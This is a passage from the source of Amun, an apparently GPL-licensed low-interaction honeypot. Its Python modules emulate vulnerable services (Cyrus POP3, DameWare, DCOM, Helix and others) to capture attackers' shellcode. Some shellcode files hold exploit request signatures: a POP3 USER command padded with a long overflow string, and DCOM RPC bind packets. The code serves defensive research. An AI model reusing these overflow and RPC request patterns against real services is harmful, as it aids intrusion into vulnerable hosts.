59 | 				if bytes>0:
60 | 					resultSet["result"] = True
61 | 					resultSet["accept"] = True
62 | 					resultSet["reply"] = "".join(self.reply)
63 | 					self.shellcode.append(message)
64 | 					self.stage = "SHELLCODE"
65 | 					#resultSet["shellcode"] = "".join(self.shellcode)
66 | 					return resultSet
67 | 				else:
68 | 					resultSet["result"] = False
69 | 					resultSet["accept"] = True
70 | 					resultSet["reply"] = "None"
71 | 					self.shellcode.append(message)
72 | 					resultSet["shellcode"] = "".join(self.shellcode)
73 | 					return resultSet
74 | 			else:
75 | 				resultSet["result"] = False
76 | 				resultSet["accept"] = False
77 | 				resultSet["reply"] = "None"
78 | 				return resultSet
79 | 			return resultSet
80 | 		except KeyboardInterrupt:
81 | 			raise
82 | 		except StandardError, e:
83 | 			print e
84 | 		except:
85 | 			print "CA fatal error"
86 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-ca/ca_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-ca/ca_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-check/check_shellcodes.py:
--------------------------------------------------------------------------------
1 | 
2 | check_request_1 = "\x00\x4d\x00\x03\x00\x01\x03\xe8"
3 | 
4 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-cyruspop3/cyruspop3_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import cyruspop3_shellcodes
 21 | import os
 22 | 
 23 | class vuln:
 24 | 
 25 | 	def __init__(self):
 26 | 		try:
 27 | 			self.vuln_name = "CYRUSPOP3 Vulnerability"
 28 | 			self.stage = "CYRUSPOP3_STAGE1"
 29 | 			self.welcome_message = "cyrus-imapd-2.3.2"
 30 | 			self.shellcode = []
 31 | 		except KeyboardInterrupt:
 32 | 			raise
 33 | 
 34 | 	def print_message(self, data):
 35 | 		print "\n"
 36 | 		counter = 1
 37 | 		for byte in data:
 38 | 			if counter==16:
 39 | 				ausg = hex(struct.unpack('B',byte)[0])
 40 | 				if len(ausg) == 3:
 41 | 					list = str(ausg).split('x')
 42 | 					ausg = "%sx0%s" % (list[0],list[1])
 43 | 					print ausg
 44 | 				else:
 45 | 					print ausg
 46 | 				counter = 0
 47 | 			else:
 48 | 				ausg = hex(struct.unpack('B',byte)[0])
 49 | 				if len(ausg) == 3:
 50 | 					list = str(ausg).split('x')
 51 | 					ausg = "%sx0%s" % (list[0],list[1])
 52 | 					print ausg,
 53 | 				else:
 54 | 					print ausg,
 55 | 			counter += 1
 56 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 57 | 
 58 | 	def getVulnName(self):
 59 | 		return self.vuln_name
 60 | 
 61 | 	def getCurrentStage(self):
 62 | 		return self.stage
 63 | 
 64 | 	def getWelcomeMessage(self):
 65 | 		return self.welcome_message
 66 | 
 67 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 68 | 		try:
 69 | 			self.reply = []
 70 | 			for i in range(0,510):
 71 | 				try:
 72 | 					self.reply.append("\x00")
 73 | 				except KeyboardInterrupt:
 74 | 					raise
 75 | 			resultSet = {}
 76 | 			resultSet['vulnname'] = self.vuln_name
 77 | 			resultSet['result'] = False
 78 | 			resultSet['accept'] = False
 79 | 			resultSet['shutdown'] = False
 80 | 			resultSet['reply'] = "None"
 81 | 			resultSet['stage'] = self.stage
 82 | 			resultSet['shellcode'] = "None"
 83 | 			resultSet["isFile"] = False
 84 | 
 85 | 			if self.stage=="CYRUSPOP3_STAGE1" and bytes>1000:
 86 | 				resultSet['result'] = True
 87 | 				resultSet['accept'] = True
 88 | 				resultSet['shutdown'] = True
 89 | 				return resultSet
 90 | 			elif self.stage=="CYRUSPOP3_STAGE1" and bytes==533:
 91 | 				resultSet['result'] = False
 92 | 				resultSet['accept'] = True
 93 | 				self.shellcode.append(message)
 94 | 				resultSet['shellcode'] = "".join(self.shellcode)
 95 | 				return resultSet
 96 | 			else:
 97 | 				resultSet['result'] = False
 98 | 				resultSet['reply'] = "None"
 99 | 				return resultSet
100 | 			return resultSet
101 | 		except KeyboardInterrupt:
102 | 			raise
103 | 		except StandardError, e:
104 | 			print e
105 | 			return resultSet
106 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-cyruspop3/cyruspop3_shellcodes.py:
--------------------------------------------------------------------------------
1 | 
2 | cyruspop3_request_stage1="\x55\x53\x45\x52\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x0d\x0a"
3 | 
4 | 
5 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-dameware/dameware_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import amun_logging
 20 | import random
 21 | import dameware_shellcodes
 22 | 
 23 | import traceback
 24 | import StringIO
 25 | import sys
 26 | 
 27 | class vuln:
 28 | 	def __init__(self):
 29 | 		try:
 30 | 			self.vuln_name = "DAMEWARE Vulnerability"
 31 | 			self.stage = "DAMEWARE_STAGE1"
 32 | 			self.welcome_message = ""
 33 | 			self.shellcode = []
 34 | 		except KeyboardInterrupt:
 35 | 			raise
 36 | 
 37 | 	def print_message(self, data):
 38 | 		print "\n"
 39 | 		counter = 1
 40 | 		for byte in data:
 41 | 			if counter==16:
 42 | 				ausg = hex(struct.unpack("B",byte)[0])
 43 | 				if len(ausg) == 3:
 44 | 					list = str(ausg).split("x")
 45 | 					ausg = "%sx0%s" % (list[0],list[1])
 46 | 					print ausg
 47 | 				else:
 48 | 					print ausg
 49 | 				counter = 0
 50 | 			else:
 51 | 				ausg = hex(struct.unpack("B",byte)[0])
 52 | 				if len(ausg) == 3:
 53 | 					list = str(ausg).split("x")
 54 | 					ausg = "%sx0%s" % (list[0],list[1])
 55 | 					print ausg,
 56 | 				else:
 57 | 					print ausg,
 58 | 			counter += 1
 59 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 60 | 
 61 | 	def getVulnName(self):
 62 | 		return self.vuln_name
 63 | 
 64 | 	def getCurrentStage(self):
 65 | 		return self.stage
 66 | 
 67 | 	def getWelcomeMessage(self):
 68 | 		return self.welcome_message
 69 | 
 70 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 71 | 		try:
 72 | 			### logging object
 73 | 			self.log_obj = amun_logging.amun_logging("vuln_dameware", vuLogger)
 74 | 			### construct standard reply
 75 | 			self.reply = random_reply[:62]
 76 | 
 77 | 			### prepare default resultSet
 78 | 			resultSet = {}
 79 | 			resultSet["vulnname"] = self.vuln_name
 80 | 			resultSet["accept"] = False
 81 | 			resultSet["result"] = False
 82 | 			resultSet["shutdown"] = False
 83 | 			resultSet["reply"] = "None"
 84 | 			resultSet["stage"] = self.stage
 85 | 			resultSet["shellcode"] = "None"
 86 | 			resultSet["isFile"] = False
 87 | 
 88 | 			if self.stage == "DAMEWARE_STAGE1":
 89 | 				self.log_obj.log("DAMEWARE STAGE1: Message (%s) (%s)" % (message, bytes), 12, "debug", True, True)
 90 | 				resultSet["result"] = True
 91 | 				resultSet["accept"] = True
 92 | 				self.reply[8] = "5"
 93 | 				self.reply[12] = "1"
 94 | 				self.reply[37] = "0"
 95 | 				resultSet["reply"] = "".join(self.reply)
 96 | 				self.stage = "SHELLCODE"
 97 | 				return resultSet
 98 | 			elif self.stage == "SHELLCODE":
 99 | 				if bytes>0:
100 | 					resultSet["result"] = True
101 | 					resultSet["accept"] = True
102 | 					resultSet["reply"] = "None"
103 | 					self.shellcode.append(message)
104 | 					self.stage = "SHELLCODE"
105 | 					#resultSet["shellcode"] = "".join(self.shellcode)
106 | 					return resultSet
107 | 				else:
108 | 					resultSet["result"] = False
109 | 					resultSet["accept"] = True
110 | 					resultSet["reply"] = "None"
111 | 					self.shellcode.append(message)
112 | 					resultSet["shellcode"] = "".join(self.shellcode)
113 | 					return resultSet
114 | 			else:
115 | 				resultSet["result"] = False
116 | 				resultSet["accept"] = False
117 | 				resultSet["reply"] = "None"
118 | 				return resultSet
119 | 			return resultSet
120 | 		except KeyboardInterrupt:
121 | 			raise
122 | 		except StandardError, e:
123 | 			print e
124 | 			f = StringIO.StringIO()
125 | 			traceback.print_exc(file=f)
126 | 			print f.getvalue()
127 | 			sys.exit(1)
128 | 		#except:
129 | 		#	print "DAMEWARE fatal error"
130 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-dameware/dameware_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-dameware/dameware_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-dcom/dcom_shellcodes.py:
--------------------------------------------------------------------------------
 1 | dcom_request_stage1_1 = "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\x80\xBD\xA8\xAF\x8A\x7D\xC9\x11\xBE\xF4\x08\x00\x2B\x10\x29\x89\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00"
 2 | 
 3 | dcom_request_stage1_2 = "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x7F\x00\x00\x00\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x01\x00\xa0\x01\x00\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00"
 4 | 
 5 | dcom_request_stage1_3 = "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xb8\x4a\x9f\x4d\x1c\x7d\xcf\x11\x86\x1e\x00\x20\xaf\x6e\x7c\x57\x00\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00"
 6 | 
 7 | dcom_request_stage1_4 = "\x05\x00\x0b\x03\x10\x00\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\xc4\xfe\xfc\x99\x60\x52\x1b\x10\xbb\xcb\x00\xaa\x00\x21\x34\x7a\x00\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00\x01\x00\x01\x00\xc4\xfe\xfc\x99\x60\x52\x1b\x10\xbb\xcb\x00\xaa\x00\x21\x34\x7a\x00\x00\x00\x00\x2c\x1c\xb7\x6c\x12\x98\x40\x45\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
 8 | 
 9 | dcom_request_stage1_5 = "\x05\x00\x0b\x03\x10\x00\x00\x00\xcc\x00\x00\x00\x84\x67\xbe\x18\x31\x14\x5c\x5c\x16\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x01\x00\xb8\x4a\x9f\x4d\x1c\x7d\xcf\x11\x86\x1e\x00\x20\xaf\x6e\x7c\x57\x00\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00\x02\x00\x01\x00\xa0\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00\x03\x00\x01\x00\x0A\x42\x24\x0A\x00\x17\x21\x41\x2e\x48\x01\x1d\x13\x0b\x04\x4d\x00\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00\x04\x00\x01\x00\xb0\x01\x52\x97\xca\x59\xcf\x11\xa8\xd5\x00\xa0\xc9\x0D\x80\x51\x00\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00"
10 | 
11 | dcom_request_stage1_6 = "\x05\x00\x0b\x03\x10\x00\x00\x00\xcc\x00\x00\x00\x84\x67\xbe\x18\x31\x14\x5c\x5c\x16\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x01\x00\xb8\x4a\x9f\x4d\x1c\x7d\xcf\x11\x86\x1e\x00\x20\xaf\x6e\x7c\x57\x00\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00\x02\x00\x01\x00\xa0\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00\x03\x00\x01\x00\x0A\x42\x24\x0A\x00\x17\x21\x41\x2e\x48\x01\x1d\x13\x0b\x04\x4d\x00\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00\x04\x00\x01\x00\xb0\x01\x52\x97\xca\x59\xcf\x11\xa8\xd5\x00\xa0\xc9\x0D\x80\x51\x00\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00"
12 | 
13 | dcom_request_stage1_7 = "\x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xa0\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00"
14 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-ftpd/ftpd_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-ftpd/ftpd_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-goodtech/goodtech_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import goodtech_shellcodes
 21 | 
 22 | import amun_logging
 23 | 
 24 | class vuln:
 25 | 	def __init__(self):
 26 | 		try:
 27 | 			self.vuln_name = "GOODTECH Vulnerability"
 28 | 			self.stage = "SHELLCODE"
 29 | 			self.welcome_message = ""
 30 | 			self.shellcode = []
 31 | 		except KeyboardInterrupt:
 32 | 			raise
 33 | 
 34 | 	def print_message(self, data):
 35 | 		print "\n"
 36 | 		counter = 1
 37 | 		for byte in data:
 38 | 			if counter==16:
 39 | 				ausg = hex(struct.unpack("B",byte)[0])
 40 | 				if len(ausg) == 3:
 41 | 					list = str(ausg).split("x")
 42 | 					ausg = "%sx0%s" % (list[0],list[1])
 43 | 					print ausg
 44 | 				else:
 45 | 					print ausg
 46 | 				counter = 0
 47 | 			else:
 48 | 				ausg = hex(struct.unpack("B",byte)[0])
 49 | 				if len(ausg) == 3:
 50 | 					list = str(ausg).split("x")
 51 | 					ausg = "%sx0%s" % (list[0],list[1])
 52 | 					print ausg,
 53 | 				else:
 54 | 					print ausg,
 55 | 			counter += 1
 56 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 57 | 
 58 | 	def getVulnName(self):
 59 | 		return self.vuln_name
 60 | 
 61 | 	def getCurrentStage(self):
 62 | 		return self.stage
 63 | 
 64 | 	def getWelcomeMessage(self):
 65 | 		return self.welcome_message
 66 | 
 67 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 68 | 		try:
 69 | 			self.log_obj = amun_logging.amun_logging("vuln_analyzer", vuLogger)
 70 | 
 71 | 			### construct standard reply
 72 | 			self.reply = random_reply[:62]
 73 | 
 74 | 			### prepare default resultSet
 75 | 			resultSet = {}
 76 | 			resultSet["vulnname"] = self.vuln_name
 77 | 			resultSet["accept"] = False
 78 | 			resultSet["result"] = False
 79 | 			resultSet["shutdown"] = False
 80 | 			resultSet["reply"] = "None"
 81 | 			resultSet["stage"] = self.stage
 82 | 			resultSet["shellcode"] = "None"
 83 | 			resultSet["isFile"] = False
 84 | 
 85 | 			if self.stage == "SHELLCODE":
 86 | 				if bytes>0:
 87 | 					#print ".::[Amun - GOODTECH] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
 88 | 					resultSet["result"] = True
 89 | 					resultSet["accept"] = True
 90 | 					resultSet['reply'] = "".join(self.reply)
 91 | 					self.shellcode.append(message)
 92 | 					self.stage = "SHELLCODE"
 93 | 					#resultSet["shellcode"] = "".join(self.shellcode)
 94 | 					return resultSet
 95 | 				else:
 96 | 					#print ".::[Amun - GOODTECH] finish collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
 97 | 					resultSet["result"] = False
 98 | 					resultSet["accept"] = True
 99 | 					resultSet["reply"] = "None"
100 | 					self.shellcode.append(message)
101 | 					resultSet["shellcode"] = "".join(self.shellcode)
102 | 					return resultSet
103 | 			else:
104 | 				resultSet["result"] = False
105 | 				resultSet["accept"] = False
106 | 				resultSet["reply"] = "None"
107 | 				return resultSet
108 | 			return resultSet
109 | 		except KeyboardInterrupt:
110 | 			raise
111 | 		except StandardError, e:
112 | 			print e
113 | 		except:
114 | 			print "Goodtech fatal error"
115 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-goodtech/goodtech_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-goodtech/goodtech_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-helix/helix_modul.py:
--------------------------------------------------------------------------------
  1 | try:
  2 | 	import psyco ; psyco.full()
  3 | 	from psyco.classes import *
  4 | except ImportError:
  5 | 	pass
  6 | 
  7 | import traceback
  8 | import StringIO
  9 | import sys
 10 | import struct
 11 | import amun_logging
 12 | import random
 13 | import helix_shellcodes
 14 | 
 15 | class vuln(object):
 16 | 	__slots__ = ("vuln_name", "stage", "welcome_message", "shellcode", "reply", "log_obj")
 17 | 
 18 | 	def __init__(self):
 19 | 		try:
 20 | 			self.vuln_name = "HELIX Vulnerability"
 21 | 			self.stage = "HELIX_STAGE1"
 22 | 			self.welcome_message = ""
 23 | 			self.shellcode = []
 24 | 		except KeyboardInterrupt:
 25 | 			raise
 26 | 
 27 | 	def print_message(self, data):
 28 | 		print "\n"
 29 | 		counter = 1
 30 | 		for byte in data:
 31 | 			if counter==16:
 32 | 				ausg = hex(struct.unpack("B",byte)[0])
 33 | 				if len(ausg) == 3:
 34 | 					list = str(ausg).split("x")
 35 | 					ausg = "%sx0%s" % (list[0],list[1])
 36 | 					print ausg
 37 | 				else:
 38 | 					print ausg
 39 | 				counter = 0
 40 | 			else:
 41 | 				ausg = hex(struct.unpack("B",byte)[0])
 42 | 				if len(ausg) == 3:
 43 | 					list = str(ausg).split("x")
 44 | 					ausg = "%sx0%s" % (list[0],list[1])
 45 | 					print ausg,
 46 | 				else:
 47 | 					print ausg,
 48 | 			counter += 1
 49 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 50 | 
 51 | 	def getVulnName(self):
 52 | 		return self.vuln_name
 53 | 
 54 | 	def getCurrentStage(self):
 55 | 		return self.stage
 56 | 
 57 | 	def getWelcomeMessage(self):
 58 | 		return self.welcome_message
 59 | 
 60 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 61 | 		try:
 62 | 			### logging object
 63 | 			self.log_obj = amun_logging.amun_logging("vuln_helix", vuLogger)
 64 | 			### construct standard reply
 65 | 			self.reply = random_reply
 66 | 			### prepare default resultSet
 67 | 			resultSet = {}
 68 | 			resultSet["vulnname"] = self.vuln_name
 69 | 			resultSet["accept"] = False
 70 | 			resultSet["result"] = False
 71 | 			resultSet["shutdown"] = False
 72 | 			resultSet["reply"] = "None"
 73 | 			resultSet["stage"] = self.stage
 74 | 			resultSet["shellcode"] = "None"
 75 | 			resultSet["isFile"] = False
 76 | 
 77 | 			if self.stage == "HELIX_STAGE1" and bytes>=1024:
 78 | 				resultSet["result"] = True
 79 | 				resultSet["accept"] = True
 80 | 				#resultSet["reply"] = "".join(self.reply)
 81 | 				resultSet["reply"] = "None"
 82 | 				self.shellcode.append(message)
 83 | 				self.stage = "SHELLCODE"
 84 | 				return resultSet
 85 | 			elif self.stage == "SHELLCODE":
 86 | 				if bytes>0:
 87 | 					resultSet["result"] = True
 88 | 					resultSet["accept"] = True
 89 | 					#resultSet["reply"] = "".join(self.reply)
 90 | 					resultSet["reply"] = "None"
 91 | 					self.shellcode.append(message)
 92 | 					self.stage = "SHELLCODE"
 93 | 					return resultSet
 94 | 				else:
 95 | 					resultSet["result"] = False
 96 | 					resultSet["accept"] = True
 97 | 					resultSet["reply"] = "None"
 98 | 					self.shellcode.append(message)
 99 | 					resultSet["shellcode"] = "".join(self.shellcode)
100 | 					return resultSet
101 | 			else:
102 | 				resultSet["result"] = False
